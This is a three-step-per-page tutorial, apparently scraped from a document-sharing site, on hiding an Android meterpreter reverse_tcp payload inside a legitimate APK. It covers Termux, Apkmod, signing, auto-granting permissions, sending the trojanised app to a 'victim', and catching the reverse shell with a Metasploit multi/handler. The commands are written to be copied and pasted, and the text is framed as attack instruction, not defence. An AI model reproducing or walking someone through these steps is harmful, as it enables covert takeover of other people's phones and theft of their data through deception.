You are on page 1of 3

Bind Payload with Original apk

Before Proceeding, Read the below Instructions Carefully and


Understand it then continue.
Step:1 Update and Upgrade your termux repository
Step:2 Install Apkmod
Step:3 Bind Payload with Original apk
Step:4 Sign the Binded apk using miXplorer app
Step:5 Do Auto Allow permission for Binded apk using Apk editor
Step:6 after above steps are completed then Send apk to your victim &
ask them to Install it.
Step:7 Open new session on your termux and start msfconsole & start
listener then exploit

COMMANDS [copy & paste it in your termux]


Step:1
pkg update -y
pkg upgrade -y

Step:2
wget
https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh

sh setup.sh
Step:3
apkmod

apkmod -b [path_to_originalApk] -o [path_for_saving_binded_payload]


LHOST=[Enter_your_LHOST] LPORT=[Enter _your_LPORT]

Step:4
Sign the Binded apk using miXplorer app

Step:5
Do Auto Allow permission for Binded(signed) apk using Apk editor

Step:6
Send apk to your victim & ask them to Install it.

Step:7
msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp


set LHOST [Your_LHOST]

set LPORT [Your_LPORT]

exploit

HAPPY HACKING

Don’t forget to SUBSCRIBE

You might also like